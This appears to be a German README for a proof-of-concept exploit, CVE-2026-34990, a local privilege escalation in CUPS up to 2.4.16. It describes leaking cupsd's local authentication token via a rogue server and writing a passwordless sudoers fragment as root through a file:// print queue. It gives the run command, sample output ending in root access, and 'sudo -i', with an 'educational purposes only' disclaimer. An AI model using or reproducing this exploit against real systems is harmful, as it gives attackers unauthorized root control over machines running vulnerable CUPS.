
Minimaler PoC für CVE-2026-34990: lokale Rechteausweitung in CUPS <= 2.4.16, die cupsds Local-Auth-Token leakt und ein NOPASSWD-sudoers-Fragment als root schreibt.
Lokale Rechteausweitung gegen CUPS <= 2.4.16, das als root läuft. Leakt das Local-Auth-Token von cupsd und schreibt dann als root ein NOPASSWD-sudoers-Fragment über eine file://-Druckwarteschlange.
python3 poc.py
Bei Erfolg:
[*] CVE-2026-34990 | user=ctfplayer | cupsd=127.0.0.1:631
[*] coercing cupsd - rogue server ...
[+] captured token: f4a8...c31b
[*] writing sudoers ...
[+] wrote /etc/sudoers.d/ctfplayer-pwn
[+] ROOT: uid=0(root) gid=0(root) groups=0(root)
[*] run: sudo -i
Dann:
sudo -i
Dieses Skript ist ausschließlich für Bildungszwecke gedacht. Der Autor ist nicht verantwortlich für jeglichen Missbrauch oder Schaden, der durch diesen Exploit verursacht wird. Stelle stets sicher, dass du die Erlaubnis hast, bevor du Schwachstellen testest oder ausnutzt!